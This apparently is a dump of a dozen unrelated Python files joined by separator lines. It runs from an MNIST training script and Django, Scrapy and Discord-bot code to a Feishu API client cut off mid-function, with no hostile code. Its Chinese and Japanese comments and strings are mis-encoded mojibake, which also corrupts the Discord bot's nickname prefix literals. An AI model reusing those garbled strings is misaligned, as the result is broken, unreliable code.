cur_errors = cur_input - expected_output
all_gradients = []
for layer in reversed(self._layers):
gradients = layer.compute_gradients_errors_vector(cur_errors)
cur_errors = gradients[0]
all_gradients.append(gradients[1:])
# Restore order of gradient update matrices
result = []
for gradients_list in reversed(all_gradients):
result.extend(gradients_list)
return result
def recognize_sample(self, sample_data):
assert sample_data.shape == (INPUT_HEIGHT, INPUT_WIDTH)
cur_input = sample_data
for layer in self._layers:
cur_input = layer.forward_propagate(cur_input)
return np.argmax(cur_input)
def count_errors(network, stream):
num_errors = 0
num_examples = 0
for batches in stream.get_epoch_iterator():
label_to_batch = dict(zip(stream.sources, batches))
for sample, label in itertools.izip(
label_to_batch['pixels'], label_to_batch['labels']):
num_examples += 1
output_label = network.recognize_sample(sample)
if label[0] != output_label:
num_errors += 1
return num_errors, num_examples
def load_csv(file_name, has_label):
data_arrays = []
label_arrays = []
with open(file_name, 'r') as f:
header = f.readline()
for line in f:
parts = [int(p) for p in line.strip().split(',')]
if has_label:
data = np.array(parts[1:], dtype=np.float64)
label_arrays.append(parts[0])
else:
data = np.array(parts, dtype=np.float64)
data /= 255.
data_arrays.append(data)
return data_arrays, label_arrays
def make_image_matrix(input_batches):
labels, input_arrays = input_batches
new_arrays = []
for array in input_arrays:
new_arrays.append(array.reshape(INPUT_HEIGHT, INPUT_WIDTH))
return (labels, new_arrays)
def main():
network = Network()
dataset = fuel.datasets.H5PYDataset(
'kaggle-mnist.hdf5', which_sets=('train',))
print 'Data loaded. Total examples {}'.format(
dataset.num_examples)
best_net = None
best_validation_errors = 0
cross_validation_generator = fuel.schemes.cross_validation(
fuel.schemes.SequentialScheme,
num_examples=dataset.num_examples,
num_folds = int(1/VALIDATION_DATA_PART),
strict=True,
batch_size=BATCH_SIZE)
cross_validation_schemes = list(cross_validation_generator)
num_worse = 0
num_worse_for_rate = 0
learn_rate = START_LEARN_RATE
num_train_examples = int(dataset.num_examples * (1 - VALIDATION_DATA_PART))
train_scheme = fuel.schemes.SequentialScheme(
examples = num_train_examples,
batch_size=BATCH_SIZE)
validation_scheme = fuel.schemes.SequentialScheme(
examples = range(num_train_examples, dataset.num_examples),
batch_size=BATCH_SIZE)
train_stream = fuel.transformers.Mapping(
fuel.streams.DataStream.default_stream(
dataset=dataset,
iteration_scheme=train_scheme),
make_image_matrix)
validation_stream = fuel.transformers.Mapping(
fuel.streams.DataStream.default_stream(
dataset=dataset,
iteration_scheme=validation_scheme),
make_image_matrix)
for i in xrange(N_GENERATIONS):
print '----Train Generation {} at rate {}'.format(i, learn_rate)
start_time = time.time()
all_batches = list(train_stream.get_epoch_iterator())
for index, batches in enumerate(all_batches):
sys.stdout.write('Batch {}/{}\r'.format(index, len(all_batches)))
sys.stdout.flush()
label_to_batch = dict(zip(train_stream.sources, batches))
network.learn_batch(
label_to_batch['pixels'],
label_to_batch['labels'], learn_rate)
end_learn_time = time.time()
num_errors, num_examples = count_errors(network, train_stream)
print 'Training set error rate {} based on {} samples ({})'.format(
float(num_errors) / num_examples, num_examples, num_errors)
num_errors, num_examples = count_errors(network, validation_stream)
end_validation_time = time.time()
print 'Validation set error rate {} based on {} samples ({})'.format(
float(num_errors) / num_examples, num_examples, num_errors)
print(('Learning took {} sec.,' +
' validation data {} sec.,').format(
end_learn_time - start_time,
end_validation_time - end_learn_time))
if best_net is None or num_errors < best_validation_errors:
print 'Updating best model'
best_net = copy.deepcopy(network)
best_validation_errors = num_errors
num_worse = 0
num_worse_for_rate = 0
else:
num_worse += 1
num_worse_for_rate += 1
print 'We get WORSE results. on {} iteration. Total bad results {}'.format(i, num_worse)
if num_worse >= NUM_VALIDATION_SET_WORSINESS_TO_GIVE_UP:
break
if num_worse_for_rate >= NUM_VALIDATION_SET_WORSINESS_TO_DECREASE_RATE:
learn_rate = max(learn_rate / 2., MIN_LEARN_RATE)
print 'DECREASING LEARN RATE TO {}'.format(learn_rate)
num_worse_for_rate = 0
print 'Training finished. Write result...'
data, _ = load_csv('kaggle/test.csv', False)
with open('kaggle/report-vchigrin.csv', 'w') as f:
f.write('ImageId,Label\n')
for index, sample in enumerate(data):
sample = sample.reshape(INPUT_HEIGHT, INPUT_WIDTH)
label = best_net.recognize_sample(sample)
f.write('{},{}\n'.format(index + 1, label))
if __name__ == '__main__':
main()
|
symbols = 'AAPL,IBM,MSFT,YHOO,SCO'
print(symbols.lower()) |
#Receba a quantidade de alimento em quilos. Calcule e mostre quantos dias
#durarรก esse alimento sabendo que a pessoa consome 50g ao dia.
qtd=int(input('digite a quantidade da alimento(kg): '))
print(f'o alimento durarรก {qtd/0.050} dias') |
from game.items.item import Hatchet
from game.skills import SkillTypes
class IronHatchet(Hatchet):
name = 'Iron Hatchet'
value = 56
skill_requirement = {SkillTypes.woodcutting: 1}
equip_requirement = {SkillTypes.attack: 10}
damage = 61
accuracy = 202 |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patch
import matplotlib.gridspec as gs
from DataGen import *
from DataHandle import *
#this file needs reviewing, methods may be obsolete and/or outdated
def plot_25_ims(outlines = False): #plots a 5x5 grid of images as examples
"""
Plots a 5x5 grid of training images as examples, used in notebook demo
Parameters:
arg1: boolean
If true, outlines will be drawn around the sources
Returns:
None
"""
data, labels = make_data(25)
fig, axs = plt.subplots(5,5, figsize=(10,10))
for i in range(5):
for j in range(5):
axs[i][j].imshow(data[5*i+j].T, origin = 'lower', vmax = 1, vmin = 0)
axs[i][j].axis("off")
if outlines == True:
o = 0
while(labels[5*i+j,o][2] != 0):
axs[i][j].add_patch(patch.Rectangle((labels[5*i+j,o][0], labels[5*i+j,o][1]),\
labels[5*i+j,o][2], labels[5*i+j,o][3], ec='w', fc='none'))
o += 1
if o > config.max_objects -1:
break
def plot_True_Example():
"""
Plot a single image with the bounding boxes drawn
Parameters:
None
Returns:
None
"""
img, label = make_data(1)
true = get_tiled_labels(label[0])
fig = plt.imshow(img[0], vmax = 1, vmin = 0)
ax = plt.gca()
plt.xticks(np.arange(config.f, config.L, config.f))
plt.yticks(np.arange(config.f, config.L, config.f))
plt.axis("on")
plt.grid(True)
boxes = process_pred(true) #gives true positions, see DataHandle.py
for z in range(len(boxes)):
cx, cy, w, h = boxes[z]
ax.add_patch(patch.Circle((cy,cx), 0.5, ec = 'r', fc = 'r'))
ax.add_patch(patch.Rectangle((cy-h/2, cx-w/2),\
h, w, ec='r', fc='none'))
def plot_Pred(img, label, pred, showTrue = True):
"""
Plot a single image with the the predicted bounding box drawn
Currently not in use
"""
if showTrue == True:
true = get_tiled_labels(label[0])
fig = plt.imshow(img[0], vmax = 1, vmin = 0)
ax = plt.gca()
plt.xticks(np.arange(config.f, config.L, config.f))
plt.yticks(np.arange(config.f, config.L, config.f))
plt.axis("on")
plt.grid(True)
for z in range(config.gridN**2):
i = z//config.gridN
j = z%config.gridN
if showTrue == True:
if true[0][z][0] == 1:
truex = true[0][z][1]*config.f + i*config.f
truey = true[0][z][2]*config.f + j*config.f
truew = true[0][z][3]*config.L
trueh = true[0][z][4]*config.L
ax.add_patch(patch.Circle((truey,truex), 0.5, ec = 'r', fc = 'r'))
ax.add_patch(patch.Rectangle((truey-trueh/2, truex-truew/2),\
trueh, truew, ec='r', fc='none'))
if pred[0][z][0] > config.filter_threshold:
w = pred[0][z][3]*config.L
h = pred[0][z][4]*config.L
cx = pred[0][z][1]*config.f + i*config.f
cy = pred[0][z][2]*config.f + j*config.f
ax.add_patch(patch.Circle((cy,cx), 0.5, ec = 'w', fc = 'w'))
ax.add_patch(patch.Rectangle((cy-h/2, cx-w/2),\
h, w, ec='w', fc='none'))
|
# Generated by Django 2.1.1 on 2018-10-23 03:20
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('app', '0002_auto_20181023_0319'),
]
operations = [
migrations.AlterField(
model_name='comment',
name='create_date',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from mySunPro.items import MysunproItem, MyDetailItem
# http://wz.sun0769.com/political/index/politicsNewest
class SunSpider(CrawlSpider):
name = 'sun'
# allowed_domains = ['wz.sun0769.com']
start_urls = ['http://wz.sun0769.com/political/index/politicsNewest?id=1&page=']
link = LinkExtractor(allow=r'id=1&page=\d+')
link_detail = LinkExtractor(allow=r'id=[0-9]{6}')
# politics/index?id=482186
# r'http://wz.sun0769.com/political/index/politicsNewest?id=1&page=\d+'
# LinkExtractor(allow=r'Items/')
rules = (
Rule(link, callback='parse_item', follow=True),
Rule(link_detail, callback='parse_detail', follow=True),
)
def parse_item(self, response):
item = {}
# item['domain_id'] = response.xpath('//input[@id="sid"]/@value').get()
# item['name'] = response.xpath('//div[@id="name"]').get()
# item['description'] = response.xpath('//div[@id="description"]').get()
# print(response)
li_lists = response.xpath('/html/body/div[2]/div[3]/ul[2]//li')
for li in li_lists:
new_num = li.xpath('./span[@class="state1"]/text()').extract_first()
new_title = li.xpath('./span[@class="state3"]/a/text()').extract_first()
# new_url = li.xpath('./span[@class="state3"]/a/@href').extract_first()
# http://wz.sun0769.com/political/politics/index?id=482064
# xpath่กจ่พพๅผไธญไธๅฏไปฅๅบ็ฐtbody
item = MysunproItem()
item['num'] = new_num
item['title'] = new_title
# print(new_num, new_title)
yield item
# ่งฃๆๆฐ้ปๅ
ๅฎนๅ็ผๅท
def parse_detail(self, response):
print('่ทๅ่ฏฆๆ
้กต็็ปๆ', response)
# /html/body/div[3]/div[2]/div[2]/div[1]/span[4]
new_id = response.xpath('/html/body/div[3]/div[2]/div[2]/div[1]/span[4]/text()').extract_first()
new_id = response.xpath('//div[@class="focus-date clear focus-date-list"]/span[4]/text()').extract_first()
# new_content = response.xpath('/html/body/div[3]/div[2]/div[2]/div[2]/pre/text()').extract_first()
new_content = response.xpath('//div[@class="details-box"]/pre/text()').extract_first()
# /html/body/div[3]/div[2]/div[2]/div[2]/pre
item = MyDetailItem()
item['id'] = new_id.split('๏ผ')[1]
item['content'] = new_content
# print(new_id, new_content)
yield item
|
# https://github.com/Rapptz/discord.py/blob/async/examples/reply.py was used for basic blueprints for the rest of this project
# Uses discord.py
import discord
import datetime
import asyncio
import time
import random
import os
TOKEN = os.environ.get('TOKEN')
client = discord.Client()
a = datetime.datetime.today().weekday()
counter = 0
quadice = 0
pbpractice = 0
stop = 0
sn1 = str(1)
sn2 = str(1)
sn3 = str(1)
sn4 = str(1)
def randompass():
global sn1
global sn2
global sn3
global sn4
n1 = random.randint(1, 8)
if n1 >=5:
n1 = n1 + 1
n2 = random.randint(1, 8)
if n2 >=5:
n2 = n2 + 1
n3 = random.randint(1, 8)
if n3 >=5:
n3 = n3 + 1
n4 = random.randint(1, 8)
if n4 >=5:
n4 = n4 + 1
sn1 = str(n1)
sn2 = str(n2)
sn3 = str(n3)
sn4 = str(n4)
@client.event
async def on_message(message):
global counter
global a
global quadice
global pbpractice
global stop
global sn1
global sn2
global sn3
global sn4
channel2 = client.get_channel("457939628209602560")
msg3 = ('Hello <@&457299107371941888>! Practice starts now!')
#if message.author == client.user:
#return
if message.content.startswith("!run"):
counter = counter + 1
if counter <= 1:
await client.send_message(message.channel, "Bot running in background!")
while True:
a = datetime.datetime.today().weekday()
times = time.strftime('%H:%M')
if stop <= 0:
# this first one is meant for testing. delete before final release
if times == '13:06':
pbpractice = 1
# actual practices
if times == '14:30':
if a == 6:
quadice = 1
if times == '15:00':
if a == 6:
await client.send_message(channel2, msg3)
if times == '18:30':
if a == 5:
quadice = 1
if times == '19:00':
if 2 <= a <= 4:
quadice = 1
elif a == 5:
await client.send_message(channel2, msg3)
elif a == 6:
pbpractice = 1
if times == '19:30':
if 2 <= a <= 4:
await client.send_message(channel2, msg3)
elif a == 6:
await client.send_message(channel2, msg3)
await asyncio.sleep(1)
if quadice == 1:
print('test')
if pbpractice == 1:
randompass()
msg2 = ('Hello <@&457299107371941888>! Practice starts in 30 minutes and will be a Private Battle. The pass will be: ' + sn1 + sn2 + sn3 + sn4).format(message)
await client.send_message(channel2, msg2)
pbpractice = 0
stop = 1
elif stop == 1:
await asyncio.sleep(60)
else:
await message.channel.send('Bot already started!')
if message.content.startswith('!pb'):
pbpractice = 1
if message.content.startswith('!pbstart'):
await client.send_message(channel2, msg3)
if message.content.startswith('!captain'):
curname = str(message.author.display_name)
begin = 'pZ'
capchara = "\u25C6"
supbegin = begin + capchara
if curname.startswith("pZโณ"):
newnick = curname.replace("pZโณ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโฒ"):
newnick = curname.replace("pZโฒ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโด"):
newnick = curname.replace("pZโด", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโ"):
newnick = curname
await client.send_message(message.channel, "You're already a captain!")
else:
newnick = begin + capchara + curname
await client.send_message(message.channel, "Name changed.")
await client.change_nickname(message.author, newnick)
if message.content.startswith('!omega'):
curname = str(message.author.display_name)
begin = 'pZ'
omechara = "\u25B3"
supbegin = begin + omechara
if curname.startswith("pZโณ"):
newnick = curname
await client.send_message(message.channel, "You're already in Omega!")
elif curname.startswith("pZโฒ"):
newnick = curname.replace("pZโฒ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโด"):
newnick = curname.replace("pZโด", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโ"):
newnick = curname.replace("pZโ", supbegin)
await client.send_message(message.channel, "Name changed.")
else:
newnick = begin + omechara + curname
await client.send_message(message.channel, "Name changed.")
await client.change_nickname(message.author, newnick)
if message.content.startswith('!infinite'):
curname = str(message.author.display_name)
begin = 'pZ'
infchara = "\u25B2"
supbegin = begin + infchara
if curname.startswith("pZโณ"):
newnick = curname.replace("pZโณ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโฒ"):
newnick = curname
await client.send_message(message.channel, "You're already in Infinite!")
elif curname.startswith("pZโด"):
newnick = curname.replace("pZโด", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโ"):
newnick = curname.replace("pZโ", supbegin)
await client.send_message(message.channel, "Name changed.")
else:
newnick = begin + infchara + curname
await client.send_message(message.channel, "Name changed.")
await client.change_nickname(message.author, newnick)
if message.content.startswith('!alpha'):
curname = str(message.author.display_name)
begin = 'pZ'
alpchara = "\u2234"
supbegin = begin + alpchara
if curname.startswith("pZโณ"):
newnick = curname.replace("pZโณ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโฒ"):
newnick = curname.replace("pZโฒ", supbegin)
await client.send_message(message.channel, "Name changed.")
elif curname.startswith("pZโด"):
newnick = curname
await client.send_message(message.channel, "You're already in Alpha!")
elif curname.startswith("pZโ"):
newnick = curname.replace("pZโ", supbegin)
await client.send_message(message.channel, "Name changed.")
else:
newnick = begin + alpchara + curname
await client.send_message(message.channel, "Name changed.")
await client.change_nickname(message.author, newnick)
if message.content.startswith('!hello'):
msg = 'Hello {0.author.mention}'.format(message)
await client.send_message(message.channel, msg)
if message.content.startswith('!test'):
await client.send_message(message.channel, "Hi!")
#if message.content.startswith('Hi!'):
#author = str(message.author)
#if author == 'PriZmBot#7447':
#idz = message.id
#wave = "๐"
#await client.add_reaction(message, wave)
#res = await client.wait_for_reaction(['๐'])
#thing = str(reaction.user)
#if thing == 'PriZmBot#7447':
#print('hi')
#else:
#await client.send_message(message.channel, '{0.user} reacted with {0.reaction.emoji}!'.format(res))
@client.event
async def on_ready():
print('Logged in as')
print(client.user.name)
print(client.user.id)
print('------')
client.run(TOKEN)
|
#Remember to comment code
#This program will take 2 integers and multiply them
#Input
#The input function returns the string that the user enters
#All inputs start as strings
#To change the type, you "cast" it
#Casting is the process of changing type
name = input("Please input your name: ")
a = input("Please input first number: ")
a = int(a) #Self-referencig assignment
b = input("Please input second number: ")
b = int(b)
#Process
product = a * b
#Output
print("Hi " + name + "!")
print("The product of "+str(a)+" and "+str(b)+" is "+str(product)+".")
|
#!/usr/bin/env python
import sys
from math import fabs
#grab protein and peptide info from diffmass.txt
fn = sys.argv[1]
pro = sys.argv[2]
pep = sys.argv[3]
ref = 0.0
if len(sys.argv)>4:
ref = float(sys.argv[4])
dC = 1.0033548
tol = 0.1 #Da
dd_lst = []
n_count = {}
for i in xrange(4):
n_count[i] = 0
lines = open( fn, 'r' ).readlines()
for l in lines:
es = l.strip().split()
if pro in es[0] and pep == es[1]:
dm = float(es[2])
n = round( dm / dC )
dd = dm - n*dC
if fabs(dd)<tol:
dd_lst.append(dd)
n_count[int(n)] += 1
import numpy as np
#print n_count
print "# dm=", ref, np.median(dd_lst), "std:", np.std(dd_lst)
for i in xrange(4):
if n_count[i]>0:
print "# +"+str(i), n_count[i]
if ref<-999:
for dd in dd_lst:
print dd
|
#้ฉๅฎใใญใธใงใฏใใใจใซ่ฟฝๅ ใใใใกใคใซ
from django.urls import path
from . import views
app_name = 'myapp'
urlpatterns = [
path('', views.Home.as_view(), name='home'),
path('store_setting/', views.store_setting, name='store_setting'),
path('store_show_menu/', views.store_show_menu, name='store_show_menu'),
path('store_mypage/', views.store_mypage, name='store_mypage'),
path('store_mypage/edit/', views.store_mypage_edit, name='store_mypage_edit'),
path('debug_websocket/', views.debug_websocket, name='debug_websocket'), #debug
path('debug_websocket/<slug:room_name>/', views.debug_websocket_room, name='debug_websocket_room'), #debug
] |
import time
from datetime import datetime
import requests
import json
from flask import current_app
from app import logger
from app.exceptions.exceptions import FeishuException
OPER_DICT = {
'PENDING': 'ๅฎกๆนไธญ',
'APPROVED': '้่ฟ',
'REJECTED': 'ๆ็ป',
'CANCELED': 'ๆคๅ',
'DELETED': 'ๅ ้ค'
}
class FeiShu:
def __init__(self):
self.__app_id = current_app.config["FEISHU_APP_ID"]
self.__app_secret = current_app.config["FEISHU_APP_SECRET"]
self.__opes_url = current_app.config["FEISHU_OPEN_URL"]
self.__host_url = current_app.config["FEISHU_HOST_URL"]
self.headers = self.__init_header()
def _get_tenant_access_token(self):
"""่ฎค่ฏๆฅๅฃ"""
try:
response = requests.post(self.__opes_url + '/open-apis/auth/v3/app_access_token/internal/',
data={'app_id': self.__app_id, 'app_secret': self.__app_secret})
app_access_token = json.loads(response.text)['app_access_token']
return app_access_token
except Exception as e:
logger.error("Feishu get tenant_access_token fail!")
raise FeishuException(e)
def __init_header(self):
"""headerๆ้ ๆนๆณ"""
app_access_token = self._get_tenant_access_token()
headers = {
'content-type': 'application/json',
'Authorization': 'Bearer ' + app_access_token
}
return headers
def _post(self, url, data):
"""ๅฐ่ฃ
ๅบๅฑpost่ฏทๆฑ"""
data_to_send = json.dumps(data).encode("utf-8")
try:
response = None
for x in range(3):
try:
response = requests.post(url, data=data_to_send, headers=self.headers, timeout=5)
except Exception as e:
time.sleep(1)
if x == 2:
raise e
else:
break
logger.info('Feishu post response. url={},data={},response={}'.format(url, data, response.text))
return json.loads(response.text)
except requests.exceptions.Timeout:
logger.error("Feishu post timeout! url={0} data={1}".format(url, data))
raise FeishuException('้ฃไนฆๆฅๅฃpost่ฏทๆฑ่ถ
ๆถ๏ผ่ฏท้่ฏ')
except Exception as e:
logger.error("Feishu post msg fail! url={0} data={1} error by {2}".format(url, data, e))
raise FeishuException(e)
def _get(self, url, data=None):
"""ๅฐ่ฃ
ๅบๅฑget่ฏทๆฑ"""
try:
response = None
for x in range(3):
try:
response = requests.get(url, params=data, headers=self.headers, timeout=5)
except Exception as e:
time.sleep(1)
if x == 2:
raise e
else:
break
logger.info('Feishu get response. url={},data={},response={}'.format(url, data, response.text))
return json.loads(response.text)
except requests.exceptions.Timeout:
logger.error("Feishu get timeout! url={0} data={1}".format(url, data))
raise FeishuException('้ฃไนฆๆฅๅฃget่ฏทๆฑ่ถ
ๆถ๏ผ่ฏท้่ฏ')
except Exception as e:
logger.error("Feishu get msg fail! url={0} data={1} error by {2}".format(url, data, e))
raise FeishuException(e)
def _send_msg(self, data):
"""ๆถๆฏๅ้ๅ
้จไฝฟ็จ"""
result = self._post(self.__opes_url + '/open-apis/message/v4/send/', data=data)
return result
def send_user_msg(self, user_code, content, type='text'):
"""
็ป็จๆทๅ้ๆถๆฏ
:param user_code: company id ๏ผๅๆๆฏ้ฃไนฆๅฟ
้กป่ท้ฎ็ฎฑ็ปๅฎๅจไธ่ตท๏ผๆฏๅฆ็ปๅฎๅฏไปฅๅปๆฅ็้ฃไนฆ็ไธชไบบไฟกๆฏ็ฎไป
:param content: ๅ้ๆถๆฏๅ
ๅฎน
:param type: ๅ้ๆถๆฏ็็ฑปๅ๏ผtext๏ผๆฏ็บฏๆๆฌๆถๆฏ๏ผhttps://open.feishu.cn/document/ukTMukTMukTM/uUjNz4SN2MjL1YzM๏ผ๏ผ
card๏ผๆฏๅก็ๆถๆฏใ๏ผhttps://open.feishu.cn/document/ukTMukTMukTM/uYTNwUjL2UDM14iN1ATN๏ผ
:return:
"""
try:
result = {'code': -1}
if type == 'text':
result = self._send_msg(data={
'email': user_code + "@company.com",
'msg_type': 'text',
"content": {
"text": content
}
})
elif type == 'card':
result = self._send_msg(data={
'email': user_code + "@company.com",
'msg_type': 'interactive',
'card': content
})
if result['code'] != 0:
logger.error("Send user msg fail! result={0}".format(result))
raise FeishuException(result)
except Exception as e:
raise FeishuException(e)
def send_user_msg_many(self, open_ids, content, type='text'):
"""
็ปๅคไธช็จๆทๅ้ๆถๆฏ๏ผไธๆฌกๆงๅช่ฝๅ้200ไธชไบบ๏ผๆไปฅไธ้ขๅไบๅพช็ฏๅ้
:param open_ids: ็จๆท็้ฃไนฆๅฏไธๆ ่ฏๅ่กจ๏ผ[,,,,]
:param content: ๅ้ๆถๆฏๅ
ๅฎน
:param type: ๅ้ๆถๆฏ็็ฑปๅ๏ผtext๏ผๆฏ็บฏๆๆฌๆถๆฏ๏ผhttps://open.feishu.cn/document/ukTMukTMukTM/uUjNz4SN2MjL1YzM๏ผ๏ผ
card๏ผๆฏๅก็ๆถๆฏใ๏ผhttps://open.feishu.cn/document/ukTMukTMukTM/uYTNwUjL2UDM14iN1ATN๏ผ
:return:
"""
try:
for i in range(0, len(open_ids), 199):
result = {'code': -1}
if type == 'text':
result = self._post(self.__opes_url + '/open-apis/message/v4/batch_send/', data={
'open_ids': open_ids[i:i + 199],
'msg_type': 'text',
"content": {
"text": content
}
})
elif type == 'card':
result = self._post(self.__opes_url + '/open-apis/message/v4/batch_send/', data={
'open_ids': open_ids[i:i + 199],
'msg_type': 'interactive',
'card': content
})
if result['code'] != 0:
logger.error("Send user msg many fail! result={0}".format(result))
raise FeishuException(
'ๅ้ๆๅ{}ๆก๏ผๅ้ๅคฑ่ดฅ{}ๆก๏ผ้่ฏฏไฟกๆฏ๏ผ{}'.format(i + 199, len(open_ids) - i - 199, str(result)))
except Exception as e:
raise FeishuException(e)
def get_user_id_info(self, user_code, email_type='@company.com'):
"""
้่ฟ้ฎ็ฎฑ่ทๅ็จๆท็้ฃไนฆๅฏไธๆ ่ฏ ,(https://open.feishu.cn/document/ukTMukTMukTM/uUzMyUjL1MjM14SNzITN)
:param user_code: company id
:param email_type: ้ฎ็ฎฑ็ฑปๅ๏ผไธป่ฆๆฏๆไบ็จๆทไธๆฏ็ปๅฎ็company.com
:return: {
"open_id": "ou_979112345678741d29069abcdef089d4",
"user_id": "a7eb3abe"
},
"""
try:
email_code = user_code + email_type
result = self._get(self.__opes_url + '/open-apis/user/v1/batch_get_id', {'emails': email_code})
if 'email_users' in result['data'].keys():
user_info = result['data']['email_users'][email_code][0]
return user_info
else:
raise FeishuException('้ฃไนฆ่ดฆๅทๆชไธ้ฎ็ฎฑ็ปๅฎ๏ผ่ฏท่็ณป้ฃไนฆ็ฎก็ๅ็ปๅฎ้ฎ็ฎฑ')
except Exception as ex:
logger.error("Feishu get user id info fail! user_code={0} error by {1}".format(user_code, ex))
raise FeishuException(ex)
def get_user_info(self, user_open_id):
"""
่ทๅ็จๆท็ไธชไบบไฟกๆฏ๏ผๅช่ฝ้่ฟopen_id่ทๅ (https://open.feishu.cn/document/ukTMukTMukTM/uIzNz4iM3MjLyczM)
:param user_open_id: ็จๆทๅจ้ฃไนฆ็ๅฏไธๆ ่ฏ๏ผๅฏไปฅ้่ฟๆนๆณself.get_user_id_info่ทๅ็จๆท็open_idๆ ่ฏ
:return:
"user_infos":[
{
"name":"zhang san",
"name_py":"zhang san",
"en_name":"John",
"employee_id":"a0615a67",
"employee_no":"235634",
"open_id":"ou_e03053f0541cecc3269d7a9dc34a0b21",
"union_id":"on_7dba11ff38a2119f89349876b12af65c",
.......
}
"""
try:
user_info = self._get(self.__opes_url + '/open-apis/contact/v1/user/batch_get', {'open_ids': user_open_id})
if user_info['code'] == 0:
return user_info['data']['user_infos'][0]
else:
raise FeishuException('่ทๅ่ฏฅ็จๆท้ฃไนฆไธชไบบไฟกๆฏๅคฑ่ดฅ,่ฏท่็ณป็ฎก็ๅๅค็')
except Exception as ex:
logger.error("Feishu get user info fail! user_open_id={0} error by {1}".format(user_open_id, ex))
raise FeishuException(ex)
def get_department_info(self, open_department_id):
try:
department = self._get(self.__opes_url + '/open-apis/contact/v1/department/info/get',
{'open_department_id': open_department_id})
return department
except Exception as ex:
logger.error(
"Feishu get department info fail! open_department_id={0} error by {1}".format(open_department_id, ex))
raise FeishuException(ex)
def approval_create(self, approval_code, apply_user_id, data, approval_user_id=None, approval_node_id=None):
"""
ไธดๆถๅๅธ็ณ่ฏทๅๅปบๅฎกๆน
:param approval_code: ๅฎกๆนๆต็จๅฏไธๆ ่ฏ
:param apply_user_id: ็ณ่ฏทไบบ
:param data: ่กจๅๆฐๆฎ
:param approval_user_id:ๅฎกๆนไบบ๏ผไธไผ ้ป่ฎค้ขๅฏผๅฎกๆน
:param approval_node_id:ๅฎกๆน่็นid๏ผไธไผ ้ป่ฎค้ขๅฏผๅฎกๆน
:return:
"""
try:
print(data)
approval_data = {
"approval_code": approval_code,
"user_id": apply_user_id,
"form": json.dumps(data),
}
if approval_user_id:
approval_data['node_approver_user_id_list'] = {
approval_node_id: [approval_user_id],
"manager_node_id": [approval_user_id]
}
print(approval_data)
result = self._post(self.__host_url + '/approval/openapi/v2/instance/create', approval_data)
if result['code'] != 0:
raise FeishuException('้ฃไนฆๅๅปบๅฎกๆนๅคฑ่ดฅ,้่ฏฏไฟกๆฏ๏ผ{}๏ผ่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
else:
return result['data']
except Exception as ex:
logger.error(
"Feishu approval create fail! approval_code={0},apply_user_id={1},data={2},approval_user_id={3} error by {4}"
.format(approval_code, apply_user_id, data, approval_user_id, ex))
raise FeishuException(ex)
def approval_revoke(self, approval_code, instance_code, apply_user_id):
"""
ๅฎกๆนๆคๅ
:param approval_code: ๅฎกๆนๆต็จๅฏไธๆ ่ฏ
:param instance_code: ๅฎกๆนไปปๅกid
:param apply_user_id: ็ณ่ฏทไบบid
:return:
"""
try:
result = self._post(self.__host_url + '/approval/openapi/v2/instance/cancel', {
'approval_code': approval_code,
'instance_code': instance_code,
'user_id': apply_user_id
})
if result['code'] != 0:
if self.__check_approval_status(result, instance_code, 'CANCELED'):
return 'repeat'
else:
raise FeishuException('้ฃไนฆๆคๅๅฎกๆนๅคฑ่ดฅ,้่ฏฏไฟกๆฏ๏ผ{}๏ผ่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
else:
return 'success'
except Exception as ex:
logger.error("Feishu approval revoke fail! instance_code={0},error by {1}"
.format(instance_code, ex))
raise FeishuException(ex)
def get_approval_info(self, instance_code):
"""
่ทๅๅฎกๆนๅฎไพ่ฏฆๆ
:param instance_code:ๅฎกๆนไปปๅกid
:return:
"""
try:
result = self._post(self.__host_url + '/approval/openapi/v2/instance/get', {
'instance_code': instance_code
})
if result['code'] == 0:
return result['data']
else:
raise FeishuException('้ฃไนฆ่ทๅๅฎกๆนๅฎไพ่ฏฆๆ
ๅคฑ่ดฅ๏ผ้่ฏฏไฟกๆฏๆฏ:{0},่ฏท่็ณป็ฎก็ๅๅค็'.format(result['msg']))
except Exception as ex:
logger.error("Feishu approval revoke fail! instance_code={0},error by {1}"
.format(instance_code, ex))
raise FeishuException(ex)
def __check_approval_status(self, result, instance_code, oper):
"""
ๆฃๆฅๅฎกๆน็ถๆ๏ผๅฆๆ็ถๆไธๆไฝไธไธ่ด๏ผๅๆ็คบ็จๆท
:param result:้ฃไนฆ็่ฟๅ็ถๆๆฏ65001๏ผๅ
้จ้่ฏฏ๏ผๆไปฅๅคๆญไธไธๆฏไธๆฏ้ฃไนฆ็ถๆ่ทๆไฝไธไธ่ด
:param instance_code:ๅฎกๆนไปปๅกid
:param oper:ๆง่ก็ๆไฝ
:return:
"""
if result['code'] == 65001:
try:
approval_info = self.get_approval_info(instance_code)
if approval_info['status'] == oper:
return True
elif approval_info['status'] == 'APPROVED':
raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ป้่ฟ,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
elif approval_info['status'] == 'REJECTED':
raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๆ็ป,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
elif approval_info['status'] == 'CANCELED':
raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๆคๅ,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
elif approval_info['status'] == 'DELETED':
raise FeishuException('้ฃไนฆๅฎกๆนๅทฒ็ปๅ ้ค,ๆ ๆณ่ฟ่กๅฎกๆน{}'.format(OPER_DICT[oper]))
else:
return False
except Exception as ex:
